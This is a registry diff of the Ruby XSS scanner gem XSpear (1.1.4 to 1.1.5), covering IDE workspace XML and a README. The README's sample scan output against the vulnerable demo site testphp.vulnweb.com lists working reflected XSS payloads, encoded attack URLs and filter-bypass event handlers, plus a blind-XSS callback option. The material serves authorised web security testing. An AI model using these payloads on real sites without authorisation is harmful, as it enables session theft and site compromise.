XSpear 1.1.4 → 1.1.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (6) hide show
  1. checksums.yaml +4 -4
  2. data/.idea/workspace.xml +60 -49
  3. data/README.md +81 -64
  4. data/lib/XSpear/version.rb +1 -1
  5. data/lib/XSpear.rb +89 -37
  6. metadata +2 -2
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: b975c8acedef399b45b9d865d7845d76ef202d1ef19d37dd8d7314644e379537
4
- data.tar.gz: befb749d80ee758e96aec8809947d607c1a245af4bc41e0ec059ba305b812ebe
3
+ metadata.gz: cfc44f2d92f1b26e5d333eeb40c8d6ec91f18acb718a91fa034d3ca69682dbf0
4
+ data.tar.gz: ac964e34502fd47bad4e4eafa0e7ae58505a67de2f47d2ddce1e2606607570db
5
5
  SHA512:
6
- metadata.gz: e4b3d89ad70cdc1c37b095dfd0d7a5cec84057f1ffe7522ace6f8707fa6cdb53e068e7257aa7792395eea9a5e0bc225a4fa06e614a5d41fcab16c20848710884
7
- data.tar.gz: 39fe93dc3493aa40d91226d72668f21362d2f8dc55b014e43a0b55235a2add24b1ae5ce2a0789c310ec617e50bcc23253b2c5f5819a770c9c2b39387f58456d4
6
+ metadata.gz: 54837391e4c4da2517b10248cbdcb537745830ae213e8c131db450de1e5d97dd6576e15f4e76f43fd2d0f1f53f73d4b37a2c6f7521b4dff6460b9c2bb9646a74
7
+ data.tar.gz: 794f40198ac102353e135e30f1363af28b139c531bf1bc7da4286223230d38d9b9fa1e8d46b0371c42d50f592e763d5e4eceeb4fd44dc1ae68815df8492e8f29
data/.idea/workspace.xml CHANGED
@@ -3,7 +3,9 @@
3
3
  <component name="ChangeListManager">
4
4
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
5
5
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
6
+ <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
6
7
  <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
8
+ <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
7
9
  </list>
8
10
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
9
11
  <option name="SHOW_DIALOG" value="false" />
@@ -16,23 +18,23 @@
16
18
  </component>
17
19
  <component name="FileEditorManager">
18
20
  <leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
19
- <file pinned="false" current-in-tab="false">
21
+ <file pinned="false" current-in-tab="true">
20
22
  <entry file="file://$PROJECT_DIR$/README.md">
21
23
  <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
22
24
  <state split_layout="SPLIT">
23
- <first_editor relative-caret-position="407">
24
- <caret line="243" column="42" lean-forward="true" selection-start-line="243" selection-start-column="42" selection-end-line="243" selection-end-column="42" />
25
+ <first_editor relative-caret-position="180">
26
+ <caret line="12" column="72" selection-start-line="12" selection-start-column="72" selection-end-line="12" selection-end-column="72" />
25
27
  </first_editor>
26
28
  <second_editor />
27
29
  </state>
28
30
  </provider>
29
31
  </entry>
30
32
  </file>
31
- <file pinned="false" current-in-tab="true">
33
+ <file pinned="false" current-in-tab="false">
32
34
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
33
35
  <provider selected="true" editor-type-id="text-editor">
34
- <state relative-caret-position="256">
35
- <caret line="508" column="107" lean-forward="true" selection-start-line="508" selection-start-column="107" selection-end-line="508" selection-end-column="107" />
36
+ <state relative-caret-position="134">
37
+ <caret line="76" column="9" lean-forward="true" selection-start-line="76" selection-start-column="9" selection-end-line="76" selection-end-column="9" />
36
38
  </state>
37
39
  </provider>
38
40
  </entry>
@@ -113,10 +115,10 @@
113
115
  <option value="$PROJECT_DIR$/XSpear.gemspec" />
114
116
  <option value="$PROJECT_DIR$/exe/XSpear" />
115
117
  <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
116
- <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
117
118
  <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
118
- <option value="$PROJECT_DIR$/README.md" />
119
+ <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
119
120
  <option value="$PROJECT_DIR$/lib/XSpear.rb" />
121
+ <option value="$PROJECT_DIR$/README.md" />
120
122
  </list>
121
123
  </option>
122
124
  </component>
@@ -233,21 +235,7 @@
233
235
  <workItem from="1563809961097" duration="4237000" />
234
236
  <workItem from="1563893538891" duration="11917000" />
235
237
  <workItem from="1564151699165" duration="2494000" />
236
- <workItem from="1564413097342" duration="6632000" />
237
- </task>
238
- <task id="LOCAL-00007" summary="edit gem dependency(runtime, developement)">
239
- <created>1563202364398</created>
240
- <option name="number" value="00007" />
241
- <option name="presentableId" value="LOCAL-00007" />
242
- <option name="project" value="LOCAL" />
243
- <updated>1563202364398</updated>
244
- </task>
245
- <task id="LOCAL-00008" summary="Edit readme">
246
- <created>1563202539755</created>
247
- <option name="number" value="00008" />
248
- <option name="presentableId" value="LOCAL-00008" />
249
- <option name="project" value="LOCAL" />
250
- <updated>1563202539755</updated>
238
+ <workItem from="1564413097342" duration="8852000" />
251
239
  </task>
252
240
  <task id="LOCAL-00009" summary="Edit readme">
253
241
  <created>1563202605282</created>
@@ -578,11 +566,34 @@
578
566
  <option name="project" value="LOCAL" />
579
567
  <updated>1565281795460</updated>
580
568
  </task>
581
- <option name="localTasksCounter" value="56" />
569
+ <task id="LOCAL-00056" summary="(1.1.4) [Fixed #19] Add http.code, message log, edit log format on verbose=3">
570
+ <created>1565283137057</created>
571
+ <option name="number" value="00056" />
572
+ <option name="presentableId" value="LOCAL-00056" />
573
+ <option name="project" value="LOCAL" />
574
+ <updated>1565283137057</updated>
575
+ </task>
576
+ <task id="LOCAL-00057" summary="(1.1.4) Released 1.1.4">
577
+ <created>1565283263992</created>
578
+ <option name="number" value="00057" />
579
+ <option name="presentableId" value="LOCAL-00057" />
580
+ <option name="project" value="LOCAL" />
581
+ <updated>1565283263992</updated>
582
+ </task>
583
+ <option name="localTasksCounter" value="58" />
582
584
  <servers />
583
585
  </component>
584
586
  <component name="TimeTrackingManager">
585
- <option name="totallyTimeSpent" value="45602000" />
587
+ <option name="totallyTimeSpent" value="47822000" />
588
+ </component>
589
+ <component name="TodoView">
590
+ <todo-panel id="selected-file">
591
+ <is-autoscroll-to-source value="true" />
592
+ </todo-panel>
593
+ <todo-panel id="all">
594
+ <are-packages-shown value="true" />
595
+ <is-autoscroll-to-source value="true" />
596
+ </todo-panel>
586
597
  </component>
587
598
  <component name="ToolWindowManager">
588
599
  <frame x="-1920" y="-643" width="1920" height="1080" extended-state="0" />
@@ -597,11 +608,11 @@
597
608
  <window_info anchor="bottom" id="Debug" order="3" weight="0.4" />
598
609
  <window_info anchor="bottom" id="Cvs" order="4" weight="0.25" />
599
610
  <window_info anchor="bottom" id="Inspection" order="5" weight="0.4" />
600
- <window_info anchor="bottom" id="TODO" order="6" />
611
+ <window_info anchor="bottom" id="TODO" order="6" weight="0.32970297" />
601
612
  <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
602
613
  <window_info anchor="bottom" id="Database Changes" order="8" />
603
614
  <window_info anchor="bottom" id="Version Control" order="9" />
604
- <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.32277226" />
615
+ <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.34059405" />
605
616
  <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
606
617
  <window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
607
618
  <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
@@ -614,8 +625,6 @@
614
625
  <option name="version" value="1" />
615
626
  </component>
616
627
  <component name="VcsManagerConfiguration">
617
- <MESSAGE value="(1.0.6)[fixed #6] Edit Static Analysis code" />
618
- <MESSAGE value="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정" />
619
628
  <MESSAGE value="(1.0.6)[fixed #4] Report 객체 수정" />
620
629
  <MESSAGE value="(1.0.6)[fixed #8] Added response header analysis module" />
621
630
  <MESSAGE value="(1.0.6)[fixed #9] Added method in report-cli" />
@@ -639,7 +648,9 @@
639
648
  <MESSAGE value="(1.1.2) Releases &amp; Fixed #17 (Add some event handlers..)" />
640
649
  <MESSAGE value="(1.1.3) Releases &amp; Fixed #18 (Add onload* event handler)" />
641
650
  <MESSAGE value="(1.1.4) [Fixed #20 #22] Modified JSON Format&amp;Remove Color in XSpearReporter" />
642
- <option name="LAST_COMMIT_MESSAGE" value="(1.1.4) [Fixed #20 #22] Modified JSON Format&amp;Remove Color in XSpearReporter" />
651
+ <MESSAGE value="(1.1.4) [Fixed #19] Add http.code, message log, edit log format on verbose=3" />
652
+ <MESSAGE value="(1.1.4) Released 1.1.4" />
653
+ <option name="LAST_COMMIT_MESSAGE" value="(1.1.4) Released 1.1.4" />
643
654
  </component>
644
655
  <component name="editorHistoryManager">
645
656
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -692,23 +703,6 @@
692
703
  </state>
693
704
  </provider>
694
705
  </entry>
695
- <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
696
- <provider selected="true" editor-type-id="text-editor">
697
- <state relative-caret-position="15">
698
- <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
699
- </state>
700
- </provider>
701
- </entry>
702
- <entry file="file://$PROJECT_DIR$/README.md">
703
- <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
704
- <state split_layout="SPLIT">
705
- <first_editor relative-caret-position="407">
706
- <caret line="243" column="42" lean-forward="true" selection-start-line="243" selection-start-column="42" selection-end-line="243" selection-end-column="42" />
707
- </first_editor>
708
- <second_editor />
709
- </state>
710
- </provider>
711
- </entry>
712
706
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
713
707
  <provider selected="true" editor-type-id="text-editor">
714
708
  <state relative-caret-position="-61">
@@ -723,10 +717,27 @@
723
717
  </state>
724
718
  </provider>
725
719
  </entry>
720
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
721
+ <provider selected="true" editor-type-id="text-editor">
722
+ <state relative-caret-position="15">
723
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
724
+ </state>
725
+ </provider>
726
+ </entry>
726
727
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
727
728
  <provider selected="true" editor-type-id="text-editor">
728
- <state relative-caret-position="256">
729
- <caret line="508" column="107" lean-forward="true" selection-start-line="508" selection-start-column="107" selection-end-line="508" selection-end-column="107" />
729
+ <state relative-caret-position="134">
730
+ <caret line="76" column="9" lean-forward="true" selection-start-line="76" selection-start-column="9" selection-end-line="76" selection-end-column="9" />
731
+ </state>
732
+ </provider>
733
+ </entry>
734
+ <entry file="file://$PROJECT_DIR$/README.md">
735
+ <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
736
+ <state split_layout="SPLIT">
737
+ <first_editor relative-caret-position="180">
738
+ <caret line="12" column="72" selection-start-line="12" selection-start-column="72" selection-end-line="12" selection-end-column="72" />
739
+ </first_editor>
740
+ <second_editor />
730
741
  </state>
731
742
  </provider>
732
743
  </entry>
data/README.md CHANGED
@@ -10,7 +10,7 @@ XSpear is XSS Scanner on ruby gems
10
10
  - Detect `alert` `confirm` `prompt` event on headless browser (with Selenium)
11
11
  - Testing request/response for XSS protection bypass and reflected params<br>
12
12
  + Reflected Params
13
- + Filtered test `event handler` `HTML tag` `Special Char`
13
+ + Filtered test `event handler` `HTML tag` `Special Char` `Useful code`
14
14
  - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
15
15
  - Dynamic/Static Analysis
16
16
  + Find SQL Error pattern
@@ -97,7 +97,7 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
97
97
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
98
98
  ```
99
99
 
100
- **json output**
100
+ **json output(with silence mode)**
101
101
  ```
102
102
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1
103
103
  ```
@@ -117,9 +117,12 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
117
117
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
118
118
  ```
119
119
 
120
- **testing blind xss**
120
+ **testing blind xss**<br>
121
+ (Should be used as much as possible because Blind XSS is everywhere)<br>
121
122
  ```
122
123
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht"
124
+
125
+ # Set your blind xss host. <-b options>
123
126
  ```
124
127
 
125
128
  etc...
@@ -139,75 +142,89 @@ __((_)(_)) /(/( /((_))(_))(()\
139
142
  |_| \ /<
140
143
  {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
141
144
  / \<
142
- \> [ v1.0.7 ]
143
- [*] creating a test query.
144
- [*] test query generation is complete. [149 query]
145
- [*] starting test and analysis. [10 threads]
146
- [I] [00:37:34] reflected 'XsPeaR
147
- [-] [00:37:34] 'cat' Not reflected |XsPeaR
148
- [I] [00:37:34] [param: cat][Found SQL Error Pattern]
149
- [-] [00:37:34] 'STATIC' not reflected
150
- [I] [00:37:34] reflected "XsPeaR
151
- [-] [00:37:34] 'cat' Not reflected ;XsPeaR
152
- [I] [00:37:34] reflected `XsPeaR
153
- ...snip...
154
- [H] [00:37:44] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
155
- [-] [00:37:44] 'cat' not reflected <img/src onerror=alert(45)>
156
- [-] [00:37:44] 'cat' not reflected <svg/onload=alert(45)>
157
- [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
158
- [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
159
- [-] [00:37:50] 'cat' not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
160
- [-] [00:37:51] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
161
- [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>
162
- => [param: cat][triggered <script>alert(45)</script>]
163
- [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>
164
- => [param: cat][triggered <svg/onload=alert(45)>]
145
+ \> [ v1.1.5 ]
146
+ [*] analysis request..
147
+ [-] [23:50:35] [200/OK] 'zfdfasdf' not reflected rEfe6
148
+ [-] [23:50:35] [200/OK] 'cat' not reflected <script>alert(45)</script>
149
+ [I] [23:50:35] [200/OK] [param: cat][Found SQL Error Pattern]
150
+ [-] [23:50:35] [200/OK] 'zfdfasdf' not reflected <script>alert(45)</script>
151
+ [-] [23:50:35] [200/OK] 'STATIC' not reflected
152
+ [I] [23:50:35] [200/OK] reflected rEfe6[param: cat][reflected parameter]
153
+ [*] creating a test query [for reflected 2 param + blind xss ]
154
+ [*] test query generation is complete. [192 query]
155
+ [*] starting XSS Scanning. [10 threads]
156
+ ..snip..
157
+ [I] [23:50:47] [200/OK] reflected xsp<frameset>
158
+ [I] [23:50:47] [200/OK] reflected xsp<applet>
159
+ [I] [23:50:48] [200/OK] reflected document.cookie.xspear
160
+ [I] [23:50:48] [200/OK] reflected document.location.xspear
161
+ [-] [23:50:48] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
162
+ [H] [23:50:50] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
163
+ [-] [23:50:55] [200/OK] 'cat' not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
164
+ [V] [23:50:56] [200/OK] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>[param: cat][triggered <script>alert(45)</script>]
165
+ [H] [23:50:56] [200/OK] found alert/prompt/confirm (45) in selenium!! <marquee onstart=alert(45)>[param: cat][triggered <marquee onstart=alert(45)>]
166
+ [H] [23:50:57] [200/OK] found alert/prompt/confirm (45) in selenium!! <details/open/ontoggle="alert(45)">[param: cat][triggered <details/open/ontoggle="alert(45)">]
167
+ [H] [23:50:58] [200/OK] found alert/prompt/confirm (45) in selenium!! <audio src onloadstart=alert(45)>[param: cat][triggered <audio src onloadstart=alert(45)>]
168
+ [-] [23:50:59] [200/OK] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
169
+ [-] [23:50:59] [200/OK] 'cat' not found alert/prompt/confirm event <svg(0x0c)onload=alert(1)>
170
+ [V] [23:51:00] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
171
+ ...snip..
165
172
  [*] finish scan. the report is being generated..
166
- +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
167
- | [ XSpear report ] |
168
- | http://testphp.vulnweb.com/listproducts.php?cat=z |
169
- | 2019-07-24 00:37:33 +0900 ~ 2019-07-24 00:37:51 +0900 Found 12 issues. |
170
- +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
171
- | NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION |
172
- +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
173
- | 0 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern |
174
- | 1 | INFO | STATIC ANALYSIS | GET | - | original query | Found Server: nginx/1.4.1 |
175
- | 2 | INFO | STATIC ANALYSIS | GET | - | original query | Not set HSTS |
176
- | 3 | INFO | STATIC ANALYSIS | GET | - | original query | Content-Type: text/html |
177
- | 4 | LOW | STATIC ANALYSIS | GET | - | original query | Not Set X-Frame-Options |
178
- | 5 | MIDUM | STATIC ANALYSIS | GET | - | original query | Not Set CSP |
179
- | 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter |
180
- | 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern |
181
- | 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code |
182
- | 9 | HIGH | XSS | GET | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
183
- | 10 | VULN | XSS | GET | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
184
- | 11 | VULN | XSS | GET | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
185
- +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
173
+ +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
174
+ | [ XSpear report ] |
175
+ | http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fff... (snip) |
176
+ | 2019-08-14 23:50:34 +0900 ~ 2019-08-14 23:51:07 +0900 Found 24 issues. |
177
+ +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
178
+ | NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION |
179
+ +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
180
+ | 0 | INFO | STATIC ANALYSIS | GET | - | <original query> | Found Server: nginx/1.4.1 |
181
+ | 1 | INFO | STATIC ANALYSIS | GET | - | <original query> | Not set HSTS |
182
+ | 2 | INFO | STATIC ANALYSIS | GET | - | <original query> | Content-Type: text/html |
183
+ | 3 | LOW | STATIC ANALYSIS | GET | - | <original query> | Not Set X-Frame-Options |
184
+ | 4 | MIDUM | STATIC ANALYSIS | GET | - | <original query> | Not Set CSP |
185
+ | 5 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern |
186
+ | 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter |
187
+ | 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern |
188
+ | 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code |
189
+ | 9 | HIGH | XSS | GET | cat | <marquee onstart=alert(45)> | reflected HTML5 XSS Code |
190
+ | 10 | HIGH | XSS | GET | cat | <details/open/ontoggle="alert`45`"> | reflected HTML5 XSS Code |
191
+ | 11 | HIGH | XSS | GET | cat | <select autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
192
+ | 12 | HIGH | XSS | GET | cat | <input autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
193
+ | 13 | HIGH | XSS | GET | cat | <textarea autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
194
+ | 14 | HIGH | XSS | GET | cat | <audio src onloadstart=alert(45)> | reflected HTML5 XSS Code |
195
+ | 15 | HIGH | XSS | GET | cat | <meter onmouseover=alert(45)>0</meter> | reflected HTML5 XSS Code |
196
+ | 16 | HIGH | XSS | GET | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
197
+ | 17 | HIGH | XSS | GET | cat | <video/poster/onerror=alert(45)> | reflected HTML5 XSS Code |
198
+ | 18 | HIGH | XSS | GET | cat | <keygen autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
199
+ | 19 | VULN | XSS | GET | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
200
+ | 20 | HIGH | XSS | GET | cat | <marquee onstart=alert(45)> | triggered <marquee onstart=alert(45)> |
201
+ | 21 | HIGH | XSS | GET | cat | <details/open/ontoggle="alert(45)"> | triggered <details/open/ontoggle="alert(45)"> |
202
+ | 22 | HIGH | XSS | GET | cat | <audio src onloadstart=alert(45)> | triggered <audio src onloadstart=alert(45)> |
203
+ | 23 | VULN | XSS | GET | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
204
+ +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
186
205
  < Available Objects >
187
206
  [cat] param
188
- + Available Special Char: ' \ ` ) [ } : . { ] $
189
- + Available Event Handler: "onActivate","onBeforeActivate","onAfterUpdate","onAbort","onAfterPrint","onBeforeCopy","onBeforeCut","onBeforePaste","onBlur","onBeforePrint","onBeforeDeactivate","onBeforeUpdate","onBeforeEditFocus","onBegin","onBeforeUnload","onBounce","onDataSetChanged","onCellChange","onClick","onDataAvailable","onChange","onContextMenu","onCopy","onControlSelect","onDataSetComplete","onCut","onDragStart","onDragEnter","onDragOver","onDblClick","onDragEnd","onDrop","onDeactivate","onDragLeave","onDrag","onDragDrop","onHashChange","onFocusOut","onFilterChange","onEnd","onFocus","onHelp","onErrorUpdate","onFocusIn","onFinish","onError","onLayoutComplete","onKeyDown","onKeyUp","onMediaError","onLoad","onMediaComplete","onInput","onKeyPress","onloadstart","onLoseCapture","onMouseOut","onMouseDown","onMouseWheel","onMove","onMouseLeave","onMessage","onMouseEnter","onMouseMove","onMouseOver","onMouseUp","onPropertyChange","onMoveStart","onProgress","onPopState","onPaste","onOnline","onMoveEnd","onPause","onOutOfSync","onOffline","onReverse","onResize","onRedo","onRowsEnter","onRepeat","onReset","onResizeEnd","onResizeStart","onReadyStateChange","onResume","onRowInserted","onStart","onScroll","onRowExit","onSelectionChange","onSeek","onStop","onRowDelete","onSelectStart","onSelect","ontouchstart","ontouchend","onTrackChange","onSyncRestored","onTimeError","onUndo","onURLFlip","onStorage","onUnload","onSubmit","ontouchmove"
190
- + Available HTML Tag: "meta","video","iframe","embed","script","audio","svg","object","img","frameset","applet","style","frame"
207
+ + Available Special Char: ` ( \ ' { ) } [ : $ ]
208
+ + Available Event Handler: "onBeforeEditFocus","onAbort","onActivate","onAfterUpdate","onBeforeCopy","onAfterPrint","onBeforeActivate","onBeforeCut","onBeforeDeactivate","onChange","onBeforePrint","onBounce","onBeforeUnload","onCellChange","onBeforePaste","onClick","onBegin","onBlur","onBeforeUpdate","onDataSetChanged","onCut","onDblClick","onCopy","onContextMenu","onDataSetComplete","onDeactivate","onDataAvailable","onControlSelect","onDrag","onDrop","onDragEnd","onEnd","onDragLeave","onDragStart","onDragOver","onDragEnter","onDragDrop","onError","onErrorUpdate","onFinish","onFilterChange","onKeyPress","onHelp","onFocus","onInput","onHashChange","onKeyDown","onFocusIn","onFocusOut","onMessage","onMouseDown","onLoad","onLayoutComplete","onMouseEnter","onLoseCapture","onloadstart","onMediaError","onKeyUp","onMediaComplete","onMouseOver","onMouseWheel","onMove","onMouseMove","onMouseOut","onOffline","onMoveStart","onMouseLeave","onMouseUp","onMoveEnd","onPropertyChange","onOnline","onPause","onPaste","onReadyStateChange","onRedo","onProgress","onPopState","onOutOfSync","onRepeat","onResume","onRowExit","onReset","onResizeEnd","onRowsEnter","onResizeStart","onReverse","onRowDelete","onRowInserted","onResize","onStop","onSeek","onSelect","onSubmit","onStorage","onStart","onScroll","onSelectionChange","onSyncRestored","onSelectStart","onUnload","ontouchstart","onbeforescriptexecute","onTimeError","onURLFlip","ontouchmove","ontouchend","onTrackChange","onUndo","onafterscriptexecute","onpointermove","onpointerleave","onpointerup","onpointerover","onpointerdown","onpointerenter","onloadstart","onloadend","onpointerout"
209
+ + Available HTML Tag: "script","img","embed","video","audio","meta","style","frame","iframe","svg","object","frameset","applet"
191
210
  + Available Useful Code: "document.cookie","document.location","window.location"
211
+
192
212
  < Raw Query >
193
- [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
194
- [1] http://testphp.vulnweb.com/listproducts.php?cat=z?-
195
- [2] http://testphp.vulnweb.com/listproducts.php?cat=z?-
196
- [3] http://testphp.vulnweb.com/listproducts.php?cat=z?-
197
- [4] http://testphp.vulnweb.com/listproducts.php?cat=z?-
198
- [5] http://testphp.vulnweb.com/listproducts.php?cat=z?-
199
- [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6
200
- [7] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E
201
- [8] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
202
- [9] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E
203
- [10] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
204
- [11] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E
213
+ [0] http://testphp.vulnweb.com/listproducts.php?-
214
+ ..snip..
215
+ [19] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E&zfdfasdf=124fffff
216
+ [20] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmarquee%20onstart=alert(45)%3E&zfdfasdf=124fffff
217
+ [21] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cdetails/open/ontoggle=%22alert(45)%22%3E&zfdfasdf=124fffff
218
+ [22] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Caudio%20src%20onloadstart=alert(45)%3E&zfdfasdf=124fffff
219
+ [23] http://testphp.vulnweb.com/listproducts.php?cat=123'%22%3E%3Csvg/onload=alert(45)%3E&zfdfasdf=124fffff
220
+
221
+ ...snip...
205
222
  ```
206
223
 
207
224
  **to JSON**
208
225
  ```
209
- $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1
210
- {"starttime":"2019-08-09 01:26:32 +0900","endtime":"2019-08-09 01:27:04 +0900","issue_count":25,"issue_list":[{"id":0,"type":"INFO","issue":"REFLECTED","method":"GET","param":"cat","payload":"rEfe6","description":"reflected parameter"},{"id":1,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Found Server: nginx/1.4.1"},{"id":2,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not set HSTS"},{"id":3,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Content-Type: text/html"},{"id":4,"type":"LOW","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set X-Frame-Options"},{"id":5,"type":"MIDUM","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set CSP"},{"id":6,"type":"INFO","issue":"DYNAMIC ANALYSIS","method":"GET","param":"cat","payload":"XsPeaR\"","description":"Found SQL Error Pattern"},{"id":7,"type":"INFO","issue":"FILERD RULE","method":"GET","param":"cat","payload":"onhwul=64","description":"not filtered event handler on{any} pattern"},{"id":8,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"reflected XSS Code"},{"id":9,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert`45`\">","description":"reflected HTML5 XSS Code"},{"id":10,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"reflected HTML5 XSS 